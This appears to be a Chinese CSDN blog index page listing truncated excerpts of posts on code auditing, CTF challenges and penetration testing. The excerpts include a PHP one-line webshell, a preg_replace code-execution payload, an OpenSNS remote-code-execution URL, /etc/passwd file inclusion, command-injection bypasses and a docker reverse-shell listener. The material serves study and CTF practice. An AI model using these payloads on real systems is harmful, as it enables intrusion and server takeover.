自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(49)
  • 资源 (1)
  • 收藏
  • 关注

原创 mac docker安装awvs基础操作

账号: admin@admin.com。密码:Admin123。

2023-05-19 14:09:38 990

原创 upload通关,写下自己遗忘的理解~

第一关没什么好说的,前端验证直接过。第二关(Content-Type头检测文件类型绕过)我们先看一下它限制了什么我们先看一下$_FILES数组$_FILES数组内容如下: $_FILES['myFile']['name'] 客户端文件的原名称。 $_FILES['myFile']['type'] 文件的 MIME 类型,需要浏览器提供该信息的支持,例如"image/gif"。 $_FILES['myFile']['size'] 已上传文件的大小,单位为字节。 $_FILES['myFile'

2021-11-11 14:32:42 3243

原创 代码审计之-正则表达式过滤不严格导致的漏洞

demo1我们先来看个例子在www目录下创建/tmp/tokens/shell.php<?php$path = str_replace('\\','/',__FILE__);define('PATH',dirname($path));class TokenStorage{ /** * @param $action * @param $data * @throws Exception */ public function perfor

2021-11-10 16:16:42 736

原创 php代码审计之preg_replace函数

preg_replace:(PHP 5.5)功能 : 函数执行一个正则表达式的搜索和替换定义 :mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )看个例子<?phppreg_replace('/(.*)/ei', 'strtolower("\\1")', ${phpinfo()});?>...

2021-11-08 22:07:11 5761 2

原创 代码审计-zzcms2021前台写shell-复现与理解

实验环境phpstorm 2018 +xdebug (动态调试)burp(hackbar不大行)phpstudy(5.5.38)我们来看一下漏洞的主要地方payloadPOST /zzcms2021/zzcms2021/3/ucenter_api/api/uc.php?code=e33cwZ1KOYMpjjKGhPu7avvOo6fuX2GfQ3bUoYN55lxTZFUVgLk6vtNqDKWVW7OLP/qq1DWgCdCxRhNmzfM HTTP/1.1Host: 127.0.0.1

2021-11-06 14:59:07 702

原创 python多线程模块

如何使用thread模块呢?比如说爬取cnblogsimport threadingimport timeimport requestsurls = [ f"https://www.cnblogs.com/#p{page}" for page in range(1, 50+1)]def craw(url): r = requests.get(url) print(url,len(str(r.text)))def single_thread():..

2021-11-03 20:01:12 96

原创 渗透测试篇

信息收集1. DNS域传送漏洞dnsenum url -f /dns.txt --dnsserver 114.114.114.114 dnsenum.pl VERSION:1.2.32.备案号查询www.beianbeian.com3.ssl证书https://myssl.com/ssl.htmlhttps://www.chinassl.net/ssltools/ssl-checker.html4.Google搜索c段inurl: url intext:管理后台site

2021-11-02 21:19:21 3210

原创 打工仔....

list2 = []list = []for n in list:#判断是否为一个小数 if isinstance(n,float): m=n list2.append(m) else: if n < 100: m = (n + 300) / 10 if n > 300: m = n / 10 list2.append(m)for i in li

2021-10-31 14:16:47 85

原创 phpmvc框架开发入门-代码审计基础学习

day14日志函数的编写与理解在Core文件夹下建立Log.class.php<?php/** * Created by PhpStorm. * User: jing * Date: 2021-10-26 * Time: 20:38 */class Log{ //$msg错误日志信息,$level等级,$type文件保存3,$dest目标 static public function write($msg,$level='ERROR',$type=3,$dest=

2021-10-27 21:30:39 576

原创 java安全入门之泛型

什么是泛型Java泛型是J2SE1.5中引入的一个新特性,其本质是参数化类型,也就是说所操作的数据类型被指定为一个参数(type parameter),这种参数类型可以用在类、接口和方法的创建中,分别称为泛型类、泛型接口、泛型方法。-- 百度百科这句话读起来有点拗口,但是我们要抓住他说的关键,参数化类型和可以用在类、接口和方法的创建中,我们知道泛型是在什么地方使用。为什么使用泛型我们以最简单的List集合为例子,假如没有泛型:public static void main(String[]

2021-10-20 22:31:34 127

原创 java 入门安全之数据库jdbc学习

一.概念及入门概念:Java DataBase Connectivity Java 数据库连接, Java语言操作数据库JDBC本质:其实是官方(sun公司)定义的一套操作所有关系型数据库的规则,即接口。各个数据库厂商去实现这套接口,提供数据库驱动jar包。我们可以使用这套接口(JDBC)编程,真正执行的代码是驱动jar包中的实现类。快速入门:步骤:导入驱动jar包 mysql-connector-java-5.1.37-bin.jar1.复制mysql-connector-java-5

2021-10-15 20:58:15 92

原创 后渗透技巧-

查看域信息net group /domain #查看域内所有用户列表net group “domain computers” /domain #查看域成员计算机列表net group “domain admins” /domain #查看域管理员用户msf更新apt-get updateapt-get install metasploit-frameworksudo gem install bundlersudo gem update --systemsudo apt-get inst

2021-10-11 10:23:47 383

原创 java之反射

前言Class类Class类常用方法总结  1getName():返回String形式的该类的名称。  2 newInstance():根据某个Class对象产生其对应类的实例,它调用的是此类的默认构造方法(没有默认无参构造器会报错)  3 getClassLoader():返回该Class对象对应的类的类加载器。  4 getSuperClass():返回某子类所对应的直接父类所对应的Class对象  5 isArray():判定此Class对象所对应的是否是一个数组对象  6 getCom

2021-09-09 17:10:19 96

原创 文件包含include的奇淫技巧长期更新ing

前言demo其实include这个函数人人都知道,php的漏洞大多数来源于几个危险函数,这次先讲解include后面会讲解更多用法.<?php$a = $_GET['a'];include($a);?>1include文件包含漏洞windos c:\windows\System32\drivers\etc\hostslinux /etc/passwd2图片????图片????简单来说就是上传一个木马但是后缀是jpg或者png,但是include函数执行时无视后

2021-09-01 17:36:13 437 1

原创 Thinkphp 3.2.3 sql注入漏洞

源代码class IndexController extends Controller { public function index(){ $a=M('xxx'); //表名 $id=I('GET.id'); $b=$a->find($id); var_dump($b); }}创建一个test数据库然后开启mysql命令行CREATE TABLE `Course`(`id` VARCHAR(20),`username` VARCHAR

2021-08-27 18:07:11 1377

原创 java开发学习-----安全入门

一。基础此文章用来记录自己java的学习过程。路漫漫其修远兮…我是菜鸡。一.面向对象学习过程super关键字操作调用被隐藏的子类方法。demopackage day5;public class Example_7 { public static void main(String args[]){ Average aver = new Average(); aver.n = 100; float resultOne = aver.f()

2021-08-25 18:36:39 128

原创 yii漏洞-2.0.41链子复现

一环境配置1.环境 yii-2.0.41版本2. vscode+xdebug手动调试3. php环境7.1下载源码修改/config/web.php文件17行cookieValidationKey,随便设一个数目,然后,解压,到那个目录下php yii serve 启动(需要配置php环境变量)访问http//:localhost:8080自己写一个反序列化入口在controllers目录下创建一个TestController:<?phpnamespace app\contr

2021-08-25 14:14:23 472

原创 ctfshow-thinkphp篇

基础知识关于thinkphp需要知道的基本知识https://www.kancloud.cn/manual/thinkphp/1696demo1修改D:\phpStudy\PHPTutorial\WWW\thinkphp-3.2\thinkphp-3.2\Application\Home\Controller\IndexController.class.php<?phpnamespace Home\Controller;use Think\Controller;class Inde

2021-08-23 16:12:18 922

原创 yii2反序列化代码审计cve漏洞复现

一环境环境准备环境搭建yii版本2.0.37和2.0.38php版本 7.1下载完打包,直接在php yii serve访问localhost:8080二.分析漏洞漏洞出发点在\yii\vendor\yiisoft\yii2\db\BatchQueryResult.php文件中,跟进reset我们这里的_dataReader可控,然后$this->_dataREader->close(),触发__call方法(访问不存在的方法时触发)。在\yii\vendor\f

2021-08-18 12:18:51 518

原创 pop链子的构造+反序列化(学习ing)

最近做了强网杯的赌徒,写一下心得体会,第一次构造pop链子,我们先从BUUCTF[MRCTF2020]Ezpop说起Welcome to index.php<?php//flag is in flag.php//WTF IS THIS?//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95//And

2021-08-16 09:30:52 790

原创 代码审计基础,phpstorm-xDebug调试环境搭建。

1.Xdebug配置对应版本的php.ini,如果没有Xdebug这个选项只需要填以下就可。[Xdebug]zend_extension = D:\phpStudy\PHPTutorial\php\php-7.1.13-nts\ext\php_xdebug-2.9.8-7.1-vc14-nts.dllxdebug.remote_enable=Onxdebug.remote_handler=dbgpxdebug.remote_host=127.0.0.1xdebug.remote_port=91

2021-08-12 18:22:19 258

原创 一次渗透测试......OpenSNS的漏洞

fofa上直接找,找到某倒霉的站。直接搜索OpenSNSv 6.2首先开始试一试前台rceindex.php?s=weibo/share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[method]=-%3E_validationFieldItem%26id[status]=1%26id[4]=function%26id[1]=assert%26id[args]=jiang=phpinfo()%26id

2021-08-09 20:50:07 1478

原创 一句话木马的深入理解

我们都知道一句话木马比如说 <?php @eval($_POST['cmd']);?>我们平常的认知都是去写入一句话木马到一个php文件或者是jsp文件,然后连接那个文件的目录,实际上,不需要写入文件,我们照样可以利用eval函数造成一句话的形成最后拿下网站webshelldemo<?phpif(isset($_GET['c'])){ $c = $_GET['c']; eval($c);}else{ highlight_file(__FILE_

2021-08-08 13:10:48 951 3

原创 YCCMS系统代码审计

首先是环境问题,由于之前的操作不当,需要以下两个链接来修改。phpstudy环境问题首先导入就不讲了,直接开始扔seay里面审计。发现13行出现命令执行,进入<?phpclass Factory{ static private $_obj=null; static public function setAction(){ $_a=self::getA(); if (in_array($_a, array('admin', 'nav', 'article','backup','h

2021-08-08 11:46:50 453

原创 后渗透工具RedTeam-cobaltstrike搭建教程踩坑

工具下载地址https://github.com/makoto56/cobaltstrike-4.2-cn为什么说是踩坑,首先下载完成之后我把kali当成服务机,win10系统当成攻击机,进行环境搭建。kali服务机(ifconfig)-192.168.0.180**第一个坑**,授权问题先进入目录执行命令,密码随便设,笔者设为123456sudo ./teamserver 192.168.0.180 123456 发现没有权限,执行chmod 777 teamserver 进行授

2021-08-02 11:51:40 663

原创 redis未授权访问

1.种????尝试连接Redis默认端口号:6379:默认配置端口号26379:sentinel.conf配置器端口攻击机:cente os 7 ip 192.168.30.101靶机kali 2020.3 ip 192.168.30.100因为cente os上面装的redis 6.0版本没有历史漏洞,所以我们从这个kali当靶机进行渗透,原理都一样。进入redis-6.0.6目录下redis-server /etc/redis.conf启动服务同理kali也

2021-07-24 16:17:21 233 1

原创 docker未授权访问反弹shell

标题docker未授权访问反弹shell首先我们要扫描端口“2375“发现目标端口2375开放,尝试访问ip:2375/version目标靶机ip:192.168.30.101 (cente os 7)攻击kali ip: 192.168.30.100 (kali2020.3)访问出现版本泄露而且2375端口开放说明有未授权访问漏洞在kali上开启监听1111端口**nc -lvp 1111**输入以下命令 ip为目标ipdocker -H tcp://192.168.30.10

2021-07-23 17:28:23 544 1

原创 ctfshow 基础补web入门PHP特性102开始

<?phphighlight_file(__FILE__);$v1 = $_POST['v1'];$v2 = $_GET['v2'];$v3 = $_GET['v3'];$v4 = is_numeric($v2) and is_numeric($v3);if($v4){ $s = substr($v2,2); $str = call_user_func($v1,$s); echo $str; file_put_contents($v3,$str);}

2021-06-06 14:09:56 712 1

原创 [羊城杯2020]easyphp 一些思考

<?php $files = scandir('./'); foreach($files as $file) { if(is_file($file)){ if ($file !== "index.php") { unlink($file); } } } if(!isset($_GET['content']) || !isset($_GET['filenam.

2021-05-28 10:57:33 1370

原创 CVE-2019-11043 复现ctfshow

首先确定是cve 2019-11043从网上找资料来打,yu师傅的博客https://blog.csdn.net/miuzzx/article/details/111409718?spm=1001.2014.3001.5501还有https://paper.seebug.org/1063/加上自己的遇到的一些问题首先我们先安装go环境,文件太大你是拖不进去kali的,尝试使用xshell和xfpt失败从网上了解到,xshell无法直接连接kali 的 root权限 需要先改一下文件配置参考这

2021-04-28 15:32:44 186

原创 ctfshow -- sql注入--新手菜鸡理解篇

前面几关没什么好说的174开始布尔盲注http://67e2a069-23a9-4bf4-aa3d-b0ea3763cd98.chall.ctf.show:8080/api/v4.php?id=1发现注入点import requestsurl='http://5a108e2e-9059-4d80-9d86-af05ad5a7af8.chall.ctf.show/api/v4.php'flag=''for i in range(1,100): length=len(flag)

2021-03-08 22:08:57 239

原创 最新版codeblack

1.打开CodeBlocks,如果有问题的的话,在右下角会出现一个问题此时CodeBlocks是不能运行代码的,原因是由于前面我们安装时改变了安装目录,而程序去默认的目录找这个文件夹没有找到就无法编译。这个问题很容易解决。选择程序目录setting->Compiler2.然后出现下图,按照图示点击,选择自己安装的位置,找到MinGW文件夹,点击确定。3.最后点击OK,这样就完成了。程序就可以编译运行了。最新版太智障了还要让我先修一修...

2020-12-22 20:23:54 452

原创 第二届金盾信安杯 web wp1-3

by 七岁。web1考察命令执行 shell命令操作符基本上过滤了所有可用的命令平时我们都是ls 查看目录仔细发现dir命令并没有被禁止所以我们可以dir%09.%09也是这样的. 表示当前目录然后就是读文件命令被ban了那么多还有几个忽略了cut 命令awk sed fmt等等来看看cut命令试一试别的等等,最后payloadcmd=cut%09-f%091%09F14g_1s_h4rehaha.php%09web2payload:Class W

2020-12-22 15:27:07 3187 9

原创 ctf 反序列化字符逃逸

第一种,关键词过滤,变多的比如0ctf :piapiapia我先说一次什么是反序列化字符逃逸。 <?php class user{ public $user = 'admin'; public $pass = 'passwd'; } $a = new user(); $b = serialize($a); echo $b."<br>";

2020-12-17 17:55:41 948

原创 docker

最近因为要在kali上搭建一个文件上传测试平台,所以得安装一个docker环境。安装https协议以及CA证书apt-get updateapt-get install -y apt-transport-https ca-certificatesapt-get install dirmngr添加GPG密钥1curl -fsSL https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/gpg | sudo apt-key add

2020-11-10 17:32:21 174

原创 [BJDCTF2020]Easy MD5 1

开始一脸蒙蔽,尝试sql注入发现没有用抓个包试一试发现hint百度搜索md5($pass,true)发现这是一个万能密码ffifdyop但是为什么他可以执行呢,我们来了解一下这里需要注意的是,当raw项为true时,返回的这个原始二进制不是普通的二进制(0,1),而是'or’6\xc9]\x99\xe9!r,\xf9\xedb\x1c 这种。> 上面的’ffifdyop‘字符串对应的16位原始二进制的字符串就是” 'or'6\xc9]\x99\xe9!r,.

2020-10-18 15:45:25 327

原创 buuctf web刷题记录

空格过滤常见ctfweb题目中大佬的博客,持续学习学习学习https://www.ghtwf01.cn/index.php/archives/273/通过学习知道怎么样绕过以buuctf首先使用burp抓包看看过滤了什么字符基本上大部分字符都被过滤了,就很烦人尝试构造?ip=127.0.0.1;ls发现有两个东西构造cat falg.php发现被过滤了,这怎么办???flag被过滤,空格也被过滤尝试%09发现不行尝试nl%09*发现被过滤了*也就是说想要一键出flag不可能

2020-10-07 21:25:25 442

原创 CTFshow web 入门持续更新 冲冲冲

*1 命令执行篇web29很明显绕过就可以上c=system(‘nl *’);web30这里注意要绕过system这就要用到echo函数c=echo( nl *`);同理web31过滤空格用trb %09绕过web32这个题就比较骚了 过滤了echo system 空格基本上上面的方法都没法用那我们怎么去解题呢??首先尝试文件包含include"/etc/passwd"?>发现可以运行这就说明可以运行的通,并且它没有过滤$还有一个问题include包含

2020-10-06 17:36:46 456 2

原创 c语言排列组合算法

排列组合算法第五组1.ACM协会晚会ACM协会的会员越来越多了,训练量也越来也大,为使会员们在高强度的训练下得到放松,会员之间更加亲近,协会想为会员们准备一个晚会,晚会节目由会员们表演。消息一出,报名要表演节目的会员很多,多达N个,尤其是才华横溢的史老师,点名要上台唱毛不易的《消愁》,但是由于场地和时间有限,只能从这N个人中选M个,请你帮会长算一算,一共有多少种选择方法?输入描述:数据...

2020-02-21 09:41:57 4105

原创 攻防世界 Web_php_include write up

首先看题目注意两点1要get方式提交page2要绕过strstr()函数,要绕过str_replace函数因为他会把php://换成空3文件包含(要想到一句话木马)先补充一些知识关于php://input因为strstr是对大小写敏感的,用大写PHP绕过检测,同时绕过str_replace函数strstr(str1,str2) 函数用于判断字符串str2是否是str1的子串。如果是...

2020-02-19 15:48:35 320

右手助手,没有他你的mac不完整

右手助手,没有他你的mac不完整

2023-06-13

解压rar文件的神器,mac必备

解压rar文件的神器,mac必备

2023-06-13

typora mac 好用的makedown

拖进去就行

2023-06-01

金盾信安比赛记录.pdf

比赛记录,比赛记录,比赛记录,比赛记录

2021-12-12

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除